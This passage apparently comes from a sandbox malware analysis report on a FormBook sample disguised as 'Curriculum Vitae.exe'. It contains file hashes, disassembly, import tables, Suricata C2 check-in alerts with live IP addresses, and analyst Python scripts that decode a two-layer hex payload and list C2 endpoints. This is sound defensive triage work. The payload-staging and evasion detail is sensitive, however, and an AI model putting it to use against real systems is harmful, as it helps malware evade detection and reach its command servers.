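    A dangling tail shorter than one pair is ignored, because the report's
    preview is cut off mid-triplet.
    """
    out = bytearray()
    i = 0
    while i + 2 <= len(text):
        pair, filler = text[i:i + 2], text[i + 2:i + 3]
        if any(c not in "0123456789abcdef" for c in pair):
            raise ValueError(f"not a hex pair at offset {i}: {pair!r}")
        if filler and not ("A" <= filler <= "Z"):
            raise ValueError(f"unexpected filler at offset {i + 2}: {filler!r}")
        out.append(int(pair, 16))
        i += 3
    return bytes(out)


def decode_second_layer(text: str) -> bytes:
    """Strip the fillers, then decode the resulting ASCII '0x...' hex string to raw bytes."""
    inner = strip_interleaved_hex(text)
    if not inner.startswith(b"0x"):
        raise ValueError("inner layer is not a 0x-prefixed hex string")
    digits = inner[2:].decode("ascii")
    digits = digits[: len(digits) // 2 * 2]  # drop a dangling nibble from a truncated preview
    return bytes.fromhex(digits)


if __name__ == "__main__":
    for name, blob in [("sqlite preview", SQLITE_PREVIEW), ("ascii preview", ASCII_PREVIEW.encode())]:
        print(f"{name}: entropy={shannon_entropy(blob):.3f} encrypted={looks_encrypted(blob)}")
    print("inner text:", strip_interleaved_hex(ASCII_PREVIEW)[:24].decode())
    print("raw bytes :", decode_second_layer(ASCII_PREVIEW)[:9].hex(" "))  # 55 8b ec 81 ec cc 02 00 00
```

The two-layer structure matters for triage: the outer file is plain ASCII with entropy around 4 bits per byte, so an entropy-only rule such as the "Encrypted" flag will not surface it; the payload only becomes visible after both decodes.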
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.153608100898532
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:Curriculum Vitae.exe
                    File size:1'268'224 bytes
                    MD5:eda3b2c20013e6a58d10ad852d39fd29
                    SHA1:56ff3fdfee53f3e37c14cf10bc3d4044535a9da0
                    SHA256:291ca7bba147041963c8d17b3504981dd2eb595945e7472d5e3e62d78f0fd6a7
                    SHA512:bf0b484012b7f06628cde2aef373c5f66e7fa2664e827004b58cd5a20962a92c9f29ccc3fb55bdd6e38e57a580a6e2cf0ce987f7c85e31b3555d9f1cc805dd2e
                    SSDEEP:24576:7qDEvCTbMWu7rQYlBQcBiT6rprG8aWMLl2qsbgz2NL/HHE:7TvC/MTQYxsWR7aWjMz2x/H
                    TLSH:4245C00273D1C022FFAB92734F5AF6515ABC69260123E62F13981D79BE701B1563E7A3
                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                    Icon Hash:aaf3e3e3938382a0
                    Entrypoint:0x420577
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66CC5F49 [Mon Aug 26 10:56:09 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:948cc502fe9226992dce9417f952fce3
                    Instruction
                    call 00007F81D8C1AB83h
                    jmp 00007F81D8C1A48Fh
                    push ebp
                    mov ebp, esp
                    push esi
                    push dword ptr [ebp+08h]
                    mov esi, ecx
                    call 00007F81D8C1A66Dh
                    mov dword ptr [esi], 0049FDF0h
                    mov eax, esi
                    pop esi
                    pop ebp
                    retn 0004h
                    and dword ptr [ecx+04h], 00000000h
                    mov eax, ecx
                    and dword ptr [ecx+08h], 00000000h
                    mov dword ptr [ecx+04h], 0049FDF8h
                    mov dword ptr [ecx], 0049FDF0h
                    ret
                    push ebp
                    mov ebp, esp
                    push esi
                    push dword ptr [ebp+08h]
                    mov esi, ecx
                    call 00007F81D8C1A63Ah
                    mov dword ptr [esi], 0049FE0Ch
                    mov eax, esi
                    pop esi
                    pop ebp
                    retn 0004h
                    and dword ptr [ecx+04h], 00000000h
                    mov eax, ecx
                    and dword ptr [ecx+08h], 00000000h
                    mov dword ptr [ecx+04h], 0049FE14h
                    mov dword ptr [ecx], 0049FE0Ch
                    ret
                    push ebp
                    mov ebp, esp
                    push esi
                    mov esi, ecx
                    lea eax, dword ptr [esi+04h]
                    mov dword ptr [esi], 0049FDD0h
                    and dword ptr [eax], 00000000h
                    and dword ptr [eax+04h], 00000000h
                    push eax
                    mov eax, dword ptr [ebp+08h]
                    add eax, 04h
                    push eax
                    call 00007F81D8C1D22Dh
                    pop ecx
                    pop ecx
                    mov eax, esi
                    pop esi
                    pop ebp
                    retn 0004h
                    lea eax, dword ptr [ecx+04h]
                    mov dword ptr [ecx], 0049FDD0h
                    push eax
                    call 00007F81D8C1D278h
                    pop ecx
                    ret
                    push ebp
                    mov ebp, esp
                    push esi
                    mov esi, ecx
                    lea eax, dword ptr [esi+04h]
                    mov dword ptr [esi], 0049FDD0h
                    push eax
                    call 00007F81D8C1D261h
                    test byte ptr [ebp+08h], 00000001h
                    pop ecx
                    Programming Language:
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x5ee28 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x133000 | 0x7594 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xd4000 | 0x5ee28 | 0x5f000 | 87b20c531307b935aa0ab165037d4582 | False | 0.9302425986842106 | data | 7.900373560845221 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x133000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333 |
| RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5 |
| RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388 |
| RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524 |
| RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918 |
| RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727 |
| RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496 |
| RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227 |
| RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9 |
| RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
| RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833 |
| RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
| RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
| RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
| RT_RCDATA | 0xdc7b8 | 0x560be | data | | | 1.0003291284338593 |
| RT_GROUP_ICON | 0x132878 | 0x76 | data | English | Great Britain | 0.6610169491525424 |
| RT_GROUP_ICON | 0x1328f0 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x132904 | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x132918 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x13292c | 0x10c | data | English | Great Britain | 0.5970149253731343 |
| RT_MANIFEST | 0x132a38 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
| DLL | Import |
|---|---|
| WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect |
| VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
| MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W |
| WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable |
| PSAPI.DLL | GetProcessMemoryInfo |
| IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile |
| USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile |
| UxTheme.dll | IsThemeActive |
| KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW |
| USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient |
| GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath |
| COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
| ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW |
| SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW |
| ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket |
| OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | Great Britain | |
| Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|---|
| 2024-08-29T12:15:39.466977+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 55084 | 80 | 192.168.2.5 | 188.114.96.3 |
| 2024-08-29T12:16:13.543047+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 55091 | 80 | 192.168.2.5 | 84.32.84.32 |
| 2024-08-29T12:16:22.860493+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 55093 | 80 | 192.168.2.5 | 66.81.203.200 |
| 2024-08-29T12:14:18.641798+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 55095 | 80 | 192.168.2.5 | 66.81.203.200 |
| 2024-08-29T12:15:57.839714+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 55086 | 80 | 192.168.2.5 | 195.110.124.133 |
| 2024-08-29T12:16:00.487795+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 55087 | 80 | 192.168.2.5 | 195.110.124.133 |
| 2024-08-29T12:15:55.290457+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 55085 | 80 | 192.168.2.5 | 195.110.124.133 |
| 2024-08-29T12:16:08.467911+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 55089 | 80 | 192.168.2.5 | 84.32.84.32 |
| 2024-08-29T12:16:11.027129+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 55090 | 80 | 192.168.2.5 | 84.32.84.32 |
| 2024-08-29T12:16:16.092689+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 55092 | 80 | 192.168.2.5 | 84.32.84.32 |
| 2024-08-29T12:16:25.407496+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 55094 | 80 | 192.168.2.5 | 66.81.203.200 |
| 2024-08-29T12:16:02.916430+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 55088 | 80 | 192.168.2.5 | 195.110.124.133 |
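The Suricata table above and the TCP packet list below describe the same twelve HTTP check-ins from two angles: the IDS fires once per request, while the packet list shows every segment of the connection the request travelled in. The script below is an added example and not part of the report. It copies the twelve alerts and the first packets of two of the flows as constructed data, joins each alert to its connection by the client-side 4-tuple (source IP, source port, destination IP, destination port), reports how long after the connection's first packet the alert fired, and collapses the alerts into a deduplicated list of C2 endpoints with the ETPRO SIDs seen against each. Treating CEST and +0200 as the same offset, and comparing the timestamps as naive local times, are assumptions stated in the code.

```python
"""Join the Suricata alerts above to the TCP packet list that follows them.

Added example, not part of the Joe Sandbox report. ALERTS is the report's alert
table; PACKETS holds the first packets of two of its flows. Both tables use the
same UTC+2 offset (alerts say +0200, packets say CEST), so timestamps are compared
as naive local times; the join by client-side 4-tuple and the "delay" figure are
an analyst step of my own, not something the report computes.
"""
from collections import Counter
from dataclasses import dataclass
from datetime import datetime

SANDBOX_IP = "192.168.2.5"  # the analysis VM, the Source IP of every alert


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    signature: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int

    @property
    def flow(self) -> tuple:
        """Client->server 4-tuple used to look the alert up in the packet list."""
        return (self.src_ip, self.src_port, self.dst_ip, self.dst_port)


def parse_alert_ts(s: str) -> datetime:
    """'2024-08-29T12:15:39.466977+0200' -> naive local time (offset dropped, see module doc)."""
    return datetime.strptime(s[:-5], "%Y-%m-%dT%H:%M:%S.%f")


def parse_packet_ts(s: str) -> datetime:
    """'Aug 29, 2024 12:15:38.454984903 CEST' -> microsecond precision (nanoseconds truncated)."""
    base, frac = s.removesuffix(" CEST").split(".")
    return datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


GET_M2, POST_M3 = 2855465, 2855464  # ETPRO SIDs exactly as listed in the alert table
SIG = {GET_M2: "ETPRO MALWARE FormBook CnC Checkin (GET) M2",
       POST_M3: "ETPRO MALWARE FormBook CnC Checkin (POST) M3"}

ALERTS = [
    Alert(parse_alert_ts(ts), sid, SIG[sid], SANDBOX_IP, sport, dst, 80)
    for ts, sid, sport, dst in [
        ("2024-08-29T12:15:39.466977+0200", GET_M2, 55084, "188.114.96.3"),
        ("2024-08-29T12:16:13.543047+0200", POST_M3, 55091, "84.32.84.32"),
        ("2024-08-29T12:16:22.860493+0200", POST_M3, 55093, "66.81.203.200"),
        ("2024-08-29T12:14:18.641798+0200", POST_M3, 55095, "66.81.203.200"),
        ("2024-08-29T12:15:57.839714+0200", POST_M3, 55086, "195.110.124.133"),
        ("2024-08-29T12:16:00.487795+0200", POST_M3, 55087, "195.110.124.133"),
        ("2024-08-29T12:15:55.290457+0200", POST_M3, 55085, "195.110.124.133"),
        ("2024-08-29T12:16:08.467911+0200", POST_M3, 55089, "84.32.84.32"),
        ("2024-08-29T12:16:11.027129+0200", POST_M3, 55090, "84.32.84.32"),
        ("2024-08-29T12:16:16.092689+0200", GET_M2, 55092, "84.32.84.32"),
        ("2024-08-29T12:16:25.407496+0200", POST_M3, 55094, "66.81.203.200"),
        ("2024-08-29T12:16:02.916430+0200", GET_M2, 55088, "195.110.124.133"),
    ]
]

# (timestamp, src_port, dst_port, src_ip, dst_ip): the first five packets of two flows
PACKETS = [
    (parse_packet_ts(ts), sp, dp, sip, dip)
    for ts, sp, dp, sip, dip in [
        ("Aug 29, 2024 12:15:38.454984903 CEST", 55084, 80, SANDBOX_IP, "188.114.96.3"),
        ("Aug 29, 2024 12:15:38.459816933 CEST", 80, 55084, "188.114.96.3", SANDBOX_IP),
        ("Aug 29, 2024 12:15:38.459935904 CEST", 55084, 80, SANDBOX_IP, "188.114.96.3"),
        ("Aug 29, 2024 12:15:38.468339920 CEST", 55084, 80, SANDBOX_IP, "188.114.96.3"),
        ("Aug 29, 2024 12:15:39.466732025 CEST", 80, 55084, "188.114.96.3", SANDBOX_IP),
        ("Aug 29, 2024 12:15:54.607157946 CEST", 55085, 80, SANDBOX_IP, "195.110.124.133"),
        ("Aug 29, 2024 12:15:54.612019062 CEST", 80, 55085, "195.110.124.133", SANDBOX_IP),
        ("Aug 29, 2024 12:15:54.612114906 CEST", 55085, 80, SANDBOX_IP, "195.110.124.133"),
        ("Aug 29, 2024 12:15:54.623213053 CEST", 55085, 80, SANDBOX_IP, "195.110.124.133"),
        ("Aug 29, 2024 12:15:55.290220022 CEST", 80, 55085, "195.110.124.133", SANDBOX_IP),
    ]
]


def flow_starts(packets) -> dict:
    """Earliest packet per (src_ip, src_port, dst_ip, dst_port); for the client side that is the handshake."""
    starts = {}
    for ts, sp, dp, sip, dip in packets:
        key = (sip, sp, dip, dp)
        if key not in starts or ts < starts[key]:
            starts[key] = ts
    return starts


def alert_delays(alerts, packets) -> dict:
    """Seconds from the flow's first client packet to the alert, keyed by client port (None if the flow is absent)."""
    starts = flow_starts(packets)
    return {a.src_port: (a.ts - starts[a.flow]).total_seconds() if a.flow in starts else None
            for a in alerts}


def c2_summary(alerts) -> dict:
    """(dst_ip, dst_port) -> (alert count, sorted SIDs): the endpoint list to block and hunt on."""
    sids = {}
    for a in alerts:
        sids.setdefault((a.dst_ip, a.dst_port), set()).add(a.sid)
    counts = Counter((a.dst_ip, a.dst_port) for a in alerts)
    return {ep: (n, sorted(sids[ep])) for ep, n in counts.most_common()}


if __name__ == "__main__":
    for port, delay in alert_delays(ALERTS, PACKETS).items():
        print(f"client port {port}: " + (f"alert {delay:.3f}s after first packet"
                                        if delay is not None else "flow not in sample"))
    for (ip, port), (n, sids) in c2_summary(ALERTS).items():
        print(f"{ip}:{port}  hits={n}  sids={sids}")
```

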